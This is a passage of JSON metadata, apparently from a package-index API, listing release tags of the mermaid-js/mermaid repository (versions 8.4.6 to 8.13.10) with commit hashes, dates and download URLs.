maid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","pub